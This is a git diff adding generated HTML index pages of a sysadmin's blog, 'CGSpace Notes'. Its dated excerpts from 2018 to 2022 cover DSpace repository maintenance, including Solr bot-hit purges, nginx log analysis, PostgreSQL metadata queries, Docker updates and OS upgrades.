+ + + + + + + + + diff --git a/docs/posts/page/2/index.html b/docs/posts/page/2/index.html new file mode 100644 index 000000000..d21c3b19c --- /dev/null +++ b/docs/posts/page/2/index.html @@ -0,0 +1,449 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + CGSpace Notes + + + + + + + + + + + + + + + + + + + + + + +
+
+ +
+
+ + + + +
+
+

CGSpace Notes

+

Documenting day-to-day work on the CGSpace repository.

+
+
+ + + + +
+
+
+ + + + + + + + + +
+
+

September, 2022

+ +
+

2022-09-01

+
    +
  • A bit of work on the “Mapping CG Core–CGSpace–MEL–MARLO Types” spreadsheet
  • +
  • I tested an item submission on DSpace Test with the Cocoon org.apache.cocoon.uploads.autosave=false change +
      +
    • The submission works as expected
    • +
    +
  • +
  • Start debugging some region-related issues with csv-metadata-quality +
      +
    • I created a new test file test-geography.csv with some different scenarios
    • +
    • I also fixed a few bugs and improved the region-matching logic
    • +
    +
  • +
+ Read more → +
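The test runs would have been just the csv-metadata-quality CLI pointed at that file, roughly like this (I'm writing the flags and path from memory, so treat them as approximate):
$ csv-metadata-quality -i data/test-geography.csv -o /tmp/test-geography-cleaned.csv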
+ + + + + + + + + + + + + +
+
+

July, 2022

+ +
+

2022-07-02

+
    +
  • I learned how to use the Levenshtein functions in PostgreSQL +
      +
    • The thing is that there is a limit of 255 characters for these functions in PostgreSQL so you need to truncate the strings before comparing
    • +
    • Also, the trgm functions I’ve used before are case insensitive, but Levenshtein is not, so you need to make sure to lower case both strings first
    • +
    +
  • +
+ Read more → +
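A minimal sketch of the PostgreSQL side of that, assuming the fuzzystrmatch extension (which provides levenshtein()) and two made-up titles; the left() and lower() calls are there because of the 255-character limit and the case sensitivity mentioned above:
$ psql -d dspace -c 'CREATE EXTENSION IF NOT EXISTS fuzzystrmatch'
$ psql -d dspace -c "SELECT levenshtein(left(lower('Climate change adaptation in Kenya'), 255), left(lower('Climate-change adaptation in Kenya'), 255))"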
+ + + + + + +
+
+

June, 2022

+ +
+

2022-06-06

+
    +
  • Look at the Solr statistics on CGSpace +
      +
    • I see 167,000 hits from a bunch of Microsoft IPs with reverse DNS “msnbot-” using the Solr query dns:*msnbot* AND dns:*.msn.com
    • +
    • I purged these first so I could see the other “real” IPs in the Solr facets
    • +
    +
  • +
  • I see 47,500 hits from 80.248.237.167 on a data center ISP in Sweden, using a normal user agent
  • +
  • I see 13,000 hits from 163.237.216.11 on a data center ISP in Australia, using a normal user agent
  • +
  • I see 7,300 hits from 208.185.238.57 from Britannica, using a normal user agent +
      +
    • There seem to be many more of these:
    • +
    +
  • +
+ Read more → +
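To see how many hits such a pattern matches before purging, a query along these lines works against the statistics core (assuming Solr on localhost:8081 as elsewhere in these notes; numFound in the response is the count):
$ curl -s 'http://localhost:8081/solr/statistics/select?q=dns:*msnbot*+AND+dns:*.msn.com.&rows=0&wt=json'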
+ + + + + + +
+
+

May, 2022

+ +
+

2022-05-04

+
    +
  • I found a few more IPs making requests using the shady Chrome 44 user agent in the last few days so I will add them to the block list too: +
      +
    • 18.207.136.176
    • +
    • 185.189.36.248
    • +
    • 50.118.223.78
    • +
    • 52.70.76.123
    • +
    • 3.236.10.11
    • +
    +
  • +
  • Looking at the Solr statistics for 2022-04 +
      +
    • 52.191.137.59 is Microsoft, but they are using a normal user agent and making tens of thousands of requests
    • +
    • 64.39.98.62 is owned by Qualys, and all their requests are probing for /etc/passwd etc
    • +
    • 185.192.69.15 is in the Netherlands and is using a normal user agent, but making excessive automated HTTP requests to paths forbidden in robots.txt
    • +
    • 157.55.39.159 is owned by Microsoft and identifies as bingbot so I don’t know why its requests were logged in Solr
    • +
    • 52.233.67.176 is owned by Microsoft and uses a normal user agent, but making excessive automated HTTP requests
    • +
    • 157.55.39.144 is owned by Microsoft and uses a normal user agent, but making excessive automated HTTP requests
    • +
    • 207.46.13.177 is owned by Microsoft and identifies as bingbot so I don’t know why its requests were logged in Solr
    • +
    • If I query Solr for time:2022-04* AND dns:*msnbot* AND dns:*.msn.com. I see a handful of IPs that made 41,000 requests
    • +
    +
  • +
  • I purged 93,974 hits from these IPs using my check-spider-ip-hits.sh script
  • +
+ Read more → +
+ + + + + + +
+
+

April, 2022

+ +
+ 2022-04-01 I did G1GC tests on DSpace Test (linode26) to complement the CMS tests I did yesterday The Discovery indexing took this long: real 334m33.625s user 227m51.331s sys 3m43.037s 2022-04-04 Start a full harvest on AReS Help Marianne with submit/approve access on a new collection on CGSpace Go back in Gaia’s batch reports to find records that she indicated for replacing on CGSpace (i.e., those with better new copies, new versions, etc) Looking at the Solr statistics for 2022-03 on CGSpace I see 54. + Read more → +
+ + + + + + +
+
+

March, 2022

+ +
+

2022-03-01

+
    +
  • Send Gaia the last batch of potential duplicates for items 701 to 980:
  • +
+
$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4.csv
+$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p 'fuuu' -o /tmp/2022-03-01-tac-batch4-701-980.csv
+$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4-filenames.csv
+$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv > /tmp/2022-03-01-tac-batch4-701-980-filenames.csv
+
+ Read more → +
+ + + + + + +
+
+

February, 2022

+ +
+

2022-02-01

+
    +
  • Meeting with Peter and Abenet about CGSpace in the One CGIAR +
      +
    • We agreed to buy $5,000 worth of credits from Atmire for future upgrades
    • +
    • We agreed to move CRPs and non-CGIAR communities off the home page, as well as some other things for the CGIAR System Organization
    • +
    • We agreed to make a Discovery facet for CGIAR Action Areas above the existing CGIAR Impact Areas one
    • +
    • We agreed to try to do more alignment of affiliations/funders with ROR
    • +
    +
  • +
+ Read more → +
+ + + + + + + + + + + + + +
+
+

December, 2021

+ +
+

2021-12-01

+
    +
  • Atmire merged some changes I had submitted to the COUNTER-Robots project
  • +
  • I updated our local spider user agents and then re-ran the list with my check-spider-hits.sh script on CGSpace:
  • +
+
$ ./ilri/check-spider-hits.sh -f /tmp/agents -p  
+Purging 1989 hits from The Knowledge AI in statistics
+Purging 1235 hits from MaCoCu in statistics
+Purging 455 hits from WhatsApp in statistics
+
+Total number of bot hits purged: 3679
+
+ Read more → +
+ + + + + + + + + + + +
+ + + + +
+
+ + + + + + + + + diff --git a/docs/posts/page/3/index.html b/docs/posts/page/3/index.html new file mode 100644 index 000000000..cd4981629 --- /dev/null +++ b/docs/posts/page/3/index.html @@ -0,0 +1,444 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + CGSpace Notes + + + + + + + + + + + + + + + + + + + + + + +
+
+ +
+
+ + + + +
+
+

CGSpace Notes

+

Documenting day-to-day work on the CGSpace repository.

+
+
+ + + + +
+
+
+ + + + + + + + + +
+
+

November, 2021

+ +
+

2021-11-02

+
    +
  • I experimented with manually sharding the Solr statistics on DSpace Test
  • +
  • First I exported all the 2019 stats from CGSpace:
  • +
+
$ ./run.sh -s http://localhost:8081/solr/statistics -f 'time:2019-*' -a export -o statistics-2019.json -k uid
+$ zstd statistics-2019.json
+
+ Read more → +
+ + + + + + +
+
+

October, 2021

+ +
+

2021-10-01

+
    +
  • Export all affiliations on CGSpace and run them against the latest RoR data dump:
  • +
+
localhost/dspace63= > \COPY (SELECT DISTINCT text_value as "cg.contributor.affiliation", count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-10-01-affiliations.csv WITH CSV HEADER;
+$ csvcut -c 1 /tmp/2021-10-01-affiliations.csv | sed 1d > /tmp/2021-10-01-affiliations.txt
+$ ./ilri/ror-lookup.py -i /tmp/2021-10-01-affiliations.txt -r 2021-09-23-ror-data.json -o /tmp/2021-10-01-affiliations-matching.csv
+$ csvgrep -c matched -m true /tmp/2021-10-01-affiliations-matching.csv | sed 1d | wc -l 
+1879
+$ wc -l /tmp/2021-10-01-affiliations.txt 
+7100 /tmp/2021-10-01-affiliations.txt
+
    +
  • So we have 1879/7100 (26.46%) matching already
  • +
+ Read more → +
+ + + + + + +
+
+

September, 2021

+ +
+

2021-09-02

+
    +
  • Troubleshooting the missing Altmetric scores on AReS +
      +
    • Turns out that I didn’t actually fix them last month because the check for content.altmetric still exists, and I can’t access the DOIs using _h.source.DOI for some reason
    • +
    • I can access all other kinds of item metadata using the Elasticsearch label, but not DOI!!!
    • +
    • I will change DOI to tomato in the repository setup and start a re-harvest… I need to see if this is some kind of reserved word or something…
    • +
    • Even as tomato I can’t access that field as _h.source.tomato in Angular, but it does work as a filter source… sigh
    • +
    +
  • +
  • I’m having problems using the OpenRXV API +
      +
    • The syntax Moayad showed me last month doesn’t seem to honor the search query properly…
    • +
    +
  • +
+ Read more → +
+ + + + + + +
+
+

August, 2021

+ +
+

2021-08-01

+
    +
  • Update Docker images on AReS server (linode20) and reboot the server:
  • +
+
# docker images | grep -v ^REPO | sed 's/ \+/:/g' | cut -d: -f1,2 | grep -v none | xargs -L1 docker pull
+
    +
  • I decided to upgrade linode20 from Ubuntu 18.04 to 20.04
  • +
+ Read more → +
+ + + + + + +
+
+

July, 2021

+ +
+

2021-07-01

+
    +
  • Export another list of ALL subjects on CGSpace, including AGROVOC and non-AGROVOC for Enrico:
  • +
+
localhost/dspace63= > \COPY (SELECT DISTINCT LOWER(text_value) AS subject, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (119, 120, 127, 122, 128, 125, 135, 203, 208, 210, 215, 123, 236, 242, 187) GROUP BY subject ORDER BY count DESC) to /tmp/2021-07-01-all-subjects.csv WITH CSV HEADER;
+COPY 20994
+
+ Read more → +
+ + + + + + +
+
+

June, 2021

+ +
+

2021-06-01

+
    +
  • IWMI notified me that AReS was down with an HTTP 502 error +
      +
    • Looking at UptimeRobot I see it has been down for 33 hours, but I never got a notification
    • +
    • I don’t see anything in the Elasticsearch container logs, or the systemd journal on the host, but I notice that the angular_nginx container isn’t running
    • +
    • I simply started it and AReS was running again:
    • +
    +
  • +
+ Read more → +
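The fix was presumably nothing more than starting the container again by name (name taken from the note above):
# docker ps -a --filter name=angular_nginx
# docker start angular_nginx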
+ + + + + + +
+
+

May, 2021

+ +
+

2021-05-01

+
    +
  • I looked at the top user agents and IPs in the Solr statistics for last month and I see these user agents: +
      +
    • “RI/1.0”, 1337
    • +
    • “Microsoft Office Word 2014”, 941
    • +
    +
  • +
  • I will add the RI/1.0 pattern to our DSpace agents overload and purge them from Solr (we had previously seen this agent with 9,000 hits or so in 2020-09), but I think I will leave the Microsoft Word one… as that’s an actual user…
  • +
+ Read more → +
+ + + + + + +
+
+

April, 2021

+ +
+

2021-04-01

+
    +
  • I wrote a script to query Sherpa’s API for our ISSNs: sherpa-issn-lookup.py +
      +
    • I’m curious to see how the results compare with the results from Crossref yesterday
    • +
    +
  • +
  • AReS Explorer was down since this morning, I didn’t see anything in the systemd journal +
      +
    • I simply took everything down with docker-compose and then back up, and then it was OK
    • +
    • Perhaps one of the containers crashed, I should have looked closer but I was in a hurry
    • +
    +
  • +
+ Read more → +
+ + + + + + +
+
+

March, 2021

+ +
+

2021-03-01

+
    +
  • Discuss some OpenRXV issues with Abdullah from CodeObia +
      +
    • He’s trying to work on the DSpace 6+ metadata schema autoimport using the DSpace 6+ REST API
    • +
    • Also, we found some issues building and running OpenRXV currently due to ecosystem shift in the Node.js dependencies
    • +
    +
  • +
+ Read more → +
+ + + + + + + + + + + + + + + + + + +
+ + + + +
+
+ + + + + + + + + diff --git a/docs/posts/page/4/index.html b/docs/posts/page/4/index.html new file mode 100644 index 000000000..67098125d --- /dev/null +++ b/docs/posts/page/4/index.html @@ -0,0 +1,464 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + CGSpace Notes + + + + + + + + + + + + + + + + + + + + + + +
+
+ +
+
+ + + + +
+
+

CGSpace Notes

+

Documenting day-to-day work on the CGSpace repository.

+
+
+ + + + +
+
+
+ + + + + + + + + +
+
+

February, 2021

+ +
+

2021-02-01

+
    +
  • Abenet said that CIP found more duplicate records in their export from AReS + +
  • +
  • I had a call with CodeObia to discuss the work on OpenRXV
  • +
  • Check the results of the AReS harvesting from last night:
  • +
+
$ curl -s 'http://localhost:9200/openrxv-items-temp/_count?q=*&pretty'
+{
+  "count" : 100875,
+  "_shards" : {
+    "total" : 1,
+    "successful" : 1,
+    "skipped" : 0,
+    "failed" : 0
+  }
+}
+
+ Read more → +
+ + + + + + +
+
+

January, 2021

+ +
+

2021-01-03

+
    +
  • Peter notified me that some filters on AReS were broken again +
      +
    • It’s the same issue with the field names getting .keyword appended to the end that I already filed an issue on OpenRXV about last month
    • +
    • I fixed the broken filters (careful to not edit any others, lest they break too!)
    • +
    +
  • +
  • Fix an issue with start page number for the DSpace REST API and statistics API in OpenRXV +
      +
    • The start page had been “1” in the UI, but in the backend they were doing some gymnastics to adjust to the zero-based offset/limit/page of the DSpace REST API and the statistics API
    • +
    • I adjusted it to default to 0 and added a note to the admin screen
    • +
    • I realized that this issue was actually causing the first page of 100 statistics to be missing…
    • +
    • For example, this item has 51 views on CGSpace, but 0 on AReS
    • +
    +
  • +
+ Read more → +
+ + + + + + +
+
+

December, 2020

+ +
+

2020-12-01

+
    +
  • Atmire responded about the issue with duplicate data in our Solr statistics +
      +
    • They noticed that some records in the statistics-2015 core haven’t been migrated with the AtomicStatisticsUpdateCLI tool yet and assumed that I haven’t migrated any of the records yet
    • +
    • That’s strange, as I checked all ten cores and 2015 is the only one with some unmigrated documents, according to the cua_version field
    • +
    • I started processing those (about 411,000 records):
    • +
    +
  • +
+ Read more → +
+ + + + + + + + + + + + + +
+
+

November, 2020

+ +
+

2020-11-01

+
    +
  • Continue with processing the statistics-2019 Solr core with the AtomicStatisticsUpdateCLI tool on DSpace Test +
      +
    • So far we’ve spent at least fifty hours to process the statistics and statistics-2019 core… wow.
    • +
    +
  • +
+ Read more → +
+ + + + + + +
+
+

October, 2020

+ +
+

2020-10-06

+
    +
  • Add tests for the new /items POST handlers to the DSpace 6.x branch of my dspace-statistics-api + +
  • +
  • Trying to test the changes Atmire sent last week but I had to re-create my local database from a recent CGSpace dump +
      +
    • During the FlywayDB migration I got an error:
    • +
    +
  • +
+ Read more → +
+ + + + + + +
+
+

September, 2020

+ +
+

2020-09-02

+
    +
  • Replace Marissa van Epp for Rhys Bucknall in the CCAFS groups on CGSpace because Marissa no longer works at CCAFS
  • +
  • The AReS Explorer hasn’t updated its index since 2020-08-22 when I last forced it +
      +
    • I restarted it again now and told Moayad that the automatic indexing isn’t working
    • +
    +
  • +
  • Add Alliance of Bioversity International and CIAT to affiliations on CGSpace
  • +
  • Abenet told me that the general search text on AReS doesn’t get reset when you use the “Reset Filters” button + +
  • +
  • I filed an issue on OpenRXV to make some minor edits to the admin UI: https://github.com/ilri/OpenRXV/issues/40
  • +
+ Read more → +
+ + + + + + +
+
+

August, 2020

+ +
+

2020-08-02

+
    +
  • I spent a few days working on a Java-based curation task to tag items with ISO 3166-1 Alpha2 country codes based on their cg.coverage.country text values +
      +
    • It looks up the names in ISO 3166-1 first, and then in our CGSpace countries mapping (which has five or so of Peter’s preferred “display” country names)
    • +
    • It implements a “force” mode too that will clear existing country codes and re-tag everything
    • +
    • It is class based so I can easily add support for other vocabularies, and the technique could even be used for organizations with mappings to ROR and Clarisa…
    • +
    +
  • +
+ Read more → +
+ + + + + + +
+
+

July, 2020

+ +
+

2020-07-01

+
    +
  • A few users noticed that CGSpace wasn’t loading items today, item pages seem blank +
      +
    • I looked at the PostgreSQL locks but they don’t seem unusual
    • +
    • I guess this is the same “blank item page” issue that we had a few times in 2019 that we never solved
    • +
    • I restarted Tomcat and PostgreSQL and the issue was gone
    • +
    +
  • +
  • Since I was restarting Tomcat anyways I decided to redeploy the latest changes from the 5_x-prod branch and I added a note about COVID-19 items to the CGSpace frontpage at Peter’s request
  • +
+ Read more → +
+ + + + + + +
+
+

June, 2020

+ +
+

2020-06-01

+
    +
  • I tried to run the AtomicStatisticsUpdateCLI CUA migration script on DSpace Test (linode26) again and it is still going very slowly and has tons of errors like I noticed yesterday +
      +
    • I sent Atmire the dspace.log from today and told them to log into the server to debug the process
    • +
    +
  • +
  • In other news, I checked the statistics API on DSpace 6 and it’s working
  • +
  • I tried to build the OAI registry on the freshly migrated DSpace 6 on DSpace Test and I get an error:
  • +
+ Read more → +
+ + + + + + + + + + + +
+ + + + +
+
+ + + + + + + + + diff --git a/docs/posts/page/5/index.html b/docs/posts/page/5/index.html new file mode 100644 index 000000000..420cb8063 --- /dev/null +++ b/docs/posts/page/5/index.html @@ -0,0 +1,492 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + CGSpace Notes + + + + + + + + + + + + + + + + + + + + + + +
+
+ +
+
+ + + + +
+
+

CGSpace Notes

+

Documenting day-to-day work on the CGSpace repository.

+
+
+ + + + +
+
+
+ + + + + + + + + +
+
+

May, 2020

+ +
+

2020-05-02

+
    +
  • Peter said that CTA is having problems submitting an item to CGSpace +
      +
    • Looking at the PostgreSQL stats it seems to be the same issue that Tezira was having last week, as I see the number of connections in ‘idle in transaction’ and ‘waiting for lock’ states increasing again
    • +
    • I see that CGSpace (linode18) is still using PostgreSQL JDBC driver version 42.2.11, and there were some bugs related to transactions fixed in 42.2.12 (which I had updated in the Ansible playbooks, but not deployed yet)
    • +
    +
  • +
+ Read more → +
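A quick way to watch those connection states pile up, using nothing but the standard pg_stat_activity view:
$ psql -c 'SELECT datname, state, count(*) FROM pg_stat_activity GROUP BY 1, 2 ORDER BY 3 DESC;'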
+ + + + + + +
+
+

April, 2020

+ +
+

2020-04-02

+
    +
  • Maria asked me to update Charles Staver’s ORCID iD in the submission template and on CGSpace, as his name was lower case before, and now he has corrected it +
      +
    • I updated the fifty-eight existing items on CGSpace
    • +
    +
  • +
  • Looking into the items Udana had asked about last week that were missing Altmetric donuts: + +
  • +
  • On the same note, the one item Abenet pointed out last week now has a donut with score of 104 after I tweeted it last week
  • +
+ Read more → +
+ + + + + + + + + + + + + +
+
+

February, 2020

+ +
+

2020-02-02

+
    +
  • Continue working on porting CGSpace’s DSpace 5 code to DSpace 6.3 that I started yesterday +
      +
    • Sign up for an account with MaxMind so I can get the GeoLite2-City.mmdb database
    • +
    • I still need to wire up the API credentials and cron job into the Ansible infrastructure playbooks
    • +
    • Fix some minor issues in the config and XMLUI themes, like removing Atmire stuff
    • +
    • The code finally builds and runs with a fresh install
    • +
    +
  • +
+ Read more → +
+ + + + + + +
+
+

January, 2020

+ +
+

2020-01-06

+
    +
  • Open a ticket with Atmire to request a quote for the upgrade to DSpace 6
  • +
  • Last week Altmetric responded about the item that had a lower score than than its DOI +
      +
    • The score is now linked to the DOI
    • +
    • Another item that had the same problem in 2019 has now also linked to the score for its DOI
    • +
    • Another item that had the same problem in 2019 has also been fixed
    • +
    +
  • +
+

2020-01-07

+
    +
  • Peter Ballantyne highlighted one more WLE item that is missing the Altmetric score that its DOI has +
      +
    • The DOI has a score of 259, but the Handle has no score at all
    • +
    • I tweeted the CGSpace repository link
    • +
    +
  • +
+ Read more → +
+ + + + + + +
+
+

December, 2019

+ +
+

2019-12-01

+
    +
  • Upgrade CGSpace (linode18) to Ubuntu 18.04: +
      +
    • Check any packages that have residual configs and purge them:
    • +
    • # dpkg -l | grep -E '^rc' | awk '{print $2}' | xargs dpkg -P
    • +
    • Make sure all packages are up to date and the package manager is up to date, then reboot:
    • +
    +
  • +
+
# apt update && apt full-upgrade
+# apt-get autoremove && apt-get autoclean
+# dpkg -C
+# reboot
+
+ Read more → +
+ + + + + + +
+
+

November, 2019

+ +
+

2019-11-04

+
    +
  • Peter noticed that there were 5.2 million hits on CGSpace in 2019-10 according to the Atmire usage statistics +
      +
    • I looked in the nginx logs and see 4.6 million in the access logs, and 1.2 million in the API logs:
    • +
    +
  • +
+
# zcat --force /var/log/nginx/*access.log.*.gz | grep -cE "[0-9]{1,2}/Oct/2019"
+4671942
+# zcat --force /var/log/nginx/{rest,oai,statistics}.log.*.gz | grep -cE "[0-9]{1,2}/Oct/2019"
+1277694
+
    +
  • So 4.6 million from XMLUI and another 1.2 million from API requests
  • +
  • Let’s see how many of the REST API requests were for bitstreams (because they are counted in Solr stats):
  • +
+
# zcat --force /var/log/nginx/rest.log.*.gz | grep -c -E "[0-9]{1,2}/Oct/2019"
+1183456 
+# zcat --force /var/log/nginx/rest.log.*.gz | grep -E "[0-9]{1,2}/Oct/2019" | grep -c -E "/rest/bitstreams"
+106781
+
+ Read more → +
+ + + + + + +
+
+

October, 2019

+ +
+ 2019-10-01 Udana from IWMI asked me for a CSV export of their community on CGSpace I exported it, but a quick run through the csv-metadata-quality tool shows that there are some low-hanging fruits we can fix before I send him the data I will limit the scope to the titles, regions, subregions, and river basins for now to manually fix some non-breaking spaces (U+00A0) there that would otherwise be removed by the csv-metadata-quality script’s “unneccesary Unicode” fix: $ csvcut -c 'id,dc. + Read more → +
+ + + + + + +
+
+

September, 2019

+ +
+

2019-09-01

+
    +
  • Linode emailed to say that CGSpace (linode18) had a high rate of outbound traffic for several hours this morning
  • +
  • Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:
  • +
+
# zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E "01/Sep/2019:0" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
+    440 17.58.101.255
+    441 157.55.39.101
+    485 207.46.13.43
+    728 169.60.128.125
+    730 207.46.13.108
+    758 157.55.39.9
+    808 66.160.140.179
+    814 207.46.13.212
+   2472 163.172.71.23
+   6092 3.94.211.189
+# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E "01/Sep/2019:0" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
+     33 2a01:7e00::f03c:91ff:fe16:fcb
+     57 3.83.192.124
+     57 3.87.77.25
+     57 54.82.1.8
+    822 2a01:9cc0:47:1:1a:4:0:2
+   1223 45.5.184.72
+   1633 172.104.229.92
+   5112 205.186.128.185
+   7249 2a01:7e00::f03c:91ff:fe18:7396
+   9124 45.5.186.2
+
+ Read more → +
+ + + + + + +
+
+

August, 2019

+ +
+

2019-08-03

+
    +
  • Look at Bioversity’s latest migration CSV and now I see that Francesco has cleaned up the extra columns and the newline at the end of the file, but many of the column headers have an extra space in the name…
  • +
+

2019-08-04

+
    +
  • Deploy ORCID identifier updates requested by Bioversity to CGSpace
  • +
  • Run system updates on CGSpace (linode18) and reboot it +
      +
    • Before updating it I checked Solr and verified that all statistics cores were loaded properly…
    • +
    • After rebooting, all statistics cores were loaded… wow, that’s lucky.
    • +
    +
  • +
  • Run system updates on DSpace Test (linode19) and reboot it
  • +
+ Read more → +
+ + + + + + + + + + + +
+ + + + +
+
+ + + + + + + + + diff --git a/docs/posts/page/6/index.html b/docs/posts/page/6/index.html new file mode 100644 index 000000000..eb88b6c93 --- /dev/null +++ b/docs/posts/page/6/index.html @@ -0,0 +1,488 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + CGSpace Notes + + + + + + + + + + + + + + + + + + + + + + +
+
+ +
+
+ + + + +
+
+

CGSpace Notes

+

Documenting day-to-day work on the CGSpace repository.

+
+
+ + + + +
+
+
+ + + + + + + + + +
+
+

July, 2019

+ +
+

2019-07-01

+
    +
  • Create an “AfricaRice books and book chapters” collection on CGSpace for AfricaRice
  • +
  • Last month Sisay asked why the following “most popular” statistics link for a range of months in 2018 works for the CIAT community on DSpace Test, but not on CGSpace: + +
  • +
  • Abenet had another similar issue a few days ago when trying to find the stats for 2018 in the RTB community
  • +
+ Read more → +
+ + + + + + + + + + + + + +
+
+

May, 2019

+ +
+

2019-05-01

+
    +
  • Help CCAFS with regenerating some item thumbnails after they uploaded new PDFs to some items on CGSpace
  • +
  • A user on the dspace-tech mailing list offered some suggestions for troubleshooting the problem with the inability to delete certain items +
      +
    • Apparently if the item is in the workflowitem table it is submitted to a workflow
    • +
    • And if it is in the workspaceitem table it is in the pre-submitted state
    • +
    +
  • +
  • The item seems to be in a pre-submitted state, so I tried to delete it from there:
  • +
+
dspace=# DELETE FROM workspaceitem WHERE item_id=74648;
+DELETE 1
+
    +
  • But after this I tried to delete the item from the XMLUI and it is still present…
  • +
+ Read more → +
+ + + + + + +
+
+

April, 2019

+ +
+

2019-04-01

+
    +
  • Meeting with AgroKnow to discuss CGSpace, ILRI data, AReS, GARDIAN, etc +
      +
    • They asked if we had plans to enable RDF support in CGSpace
    • +
    +
  • +
  • There have been 4,400 more downloads of the CTA Spore publication from those strange Amazon IP addresses today +
      +
    • I suspected that some might not be successful, because the stats show less, but today they were all HTTP 200!
    • +
    +
  • +
+
# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep 'Spore-192-EN-web.pdf' | grep -E '(18.196.196.108|18.195.78.144|18.195.218.6)' | awk '{print $9}' | sort | uniq -c | sort -n | tail -n 5
+   4432 200
+
    +
  • In the last two weeks there have been 47,000 downloads of this same exact PDF by these three IP addresses
  • +
  • Apply country and region corrections and deletions on DSpace Test and CGSpace:
  • +
+
$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-9-countries.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.country -m 228 -t ACTION -d
+$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-4-regions.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.region -m 231 -t action -d
+$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-2-countries.csv -db dspace -u dspace -p 'fuuu' -m 228 -f cg.coverage.country -d
+$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace -u dspace -p 'fuuu' -m 231 -f cg.coverage.region -d
+
+ Read more → +
+ + + + + + +
+
+

March, 2019

+ +
+

2019-03-01

+
    +
  • I checked IITA’s 259 Feb 14 records from last month for duplicates using Atmire’s Duplicate Checker on a fresh snapshot of CGSpace on my local machine and everything looks good
  • +
  • I am now only waiting to hear from her about where the items should go, though I assume Journal Articles go to IITA Journal Articles collection, etc…
  • +
  • Looking at the other half of Udana’s WLE records from 2018-11 +
      +
    • I finished the ones for Restoring Degraded Landscapes (RDL), but these are for Variability, Risks and Competing Uses (VRC)
    • +
    • I did the usual cleanups for whitespace, added regions where they made sense for certain countries, cleaned up the DOI link formats, added rights information based on the publications page for a few items
    • +
    • Most worryingly, there are encoding errors in the abstracts for eleven items, for example:
    • +
    • 68.15% � 9.45 instead of 68.15% ± 9.45
    • +
    • 2003�2013 instead of 2003–2013
    • +
    +
  • +
  • I think I will need to ask Udana to re-copy and paste the abstracts with more care using Google Docs
  • +
+ Read more → +
+ + + + + + +
+
+

February, 2019

+ +
+

2019-02-01

+
    +
  • Linode has alerted a few times since last night that the CPU usage on CGSpace (linode18) was high despite me increasing the alert threshold last week from 250% to 275%—I might need to increase it again!
  • +
  • The top IPs before, during, and after this latest alert tonight were:
  • +
+
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "01/Feb/2019:(17|18|19|20|21)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
+    245 207.46.13.5
+    332 54.70.40.11
+    385 5.143.231.38
+    405 207.46.13.173
+    405 207.46.13.75
+   1117 66.249.66.219
+   1121 35.237.175.180
+   1546 5.9.6.51
+   2474 45.5.186.2
+   5490 85.25.237.71
+
    +
  • 85.25.237.71 is the “Linguee Bot” that I first saw last month
  • +
  • The Solr statistics the past few months have been very high and I was wondering if the web server logs also showed an increase
  • +
  • There were just over 3 million accesses in the nginx logs last month:
  • +
+
# time zcat --force /var/log/nginx/* | grep -cE "[0-9]{1,2}/Jan/2019"
+3018243
+
+real    0m19.873s
+user    0m22.203s
+sys     0m1.979s
+
+ Read more → +
+ + + + + + +
+
+

January, 2019

+ +
+

2019-01-02

+
    +
  • Linode alerted that CGSpace (linode18) had a higher outbound traffic rate than normal early this morning
  • +
  • I don’t see anything interesting in the web server logs around that time though:
  • +
+
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "02/Jan/2019:0(1|2|3)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
+     92 40.77.167.4
+     99 210.7.29.100
+    120 38.126.157.45
+    177 35.237.175.180
+    177 40.77.167.32
+    216 66.249.75.219
+    225 18.203.76.93
+    261 46.101.86.248
+    357 207.46.13.1
+    903 54.70.40.11
+
+ Read more → +
+ + + + + + +
+
+

December, 2018

+ +
+

2018-12-01

+
    +
  • Switch CGSpace (linode18) to use OpenJDK instead of Oracle JDK
  • +
  • I manually installed OpenJDK, then removed Oracle JDK, then re-ran the Ansible playbook to update all configuration files, etc
  • +
  • Then I ran all system updates and restarted the server
  • +
+

2018-12-02

+ + Read more → +
+ + + + + + +
+
+

November, 2018

+ +
+

2018-11-01

+
    +
  • Finalize AReS Phase I and Phase II ToRs
  • +
  • Send a note about my dspace-statistics-api to the dspace-tech mailing list
  • +
+

2018-11-03

+
    +
  • Linode has been sending mails a few times a day recently that CGSpace (linode18) has had high CPU usage
  • +
  • Today these are the top 10 IPs:
  • +
+ Read more → +
+ + + + + + +
+
+

October, 2018

+ +
+

2018-10-01

+
    +
  • Phil Thornton got an ORCID identifier so we need to add it to the list on CGSpace and tag his existing items
  • +
  • I created a GitHub issue to track this #389, because I’m super busy in Nairobi right now
  • +
+ Read more → +
+ + + + + + + + + + + +
+ + + + +
+
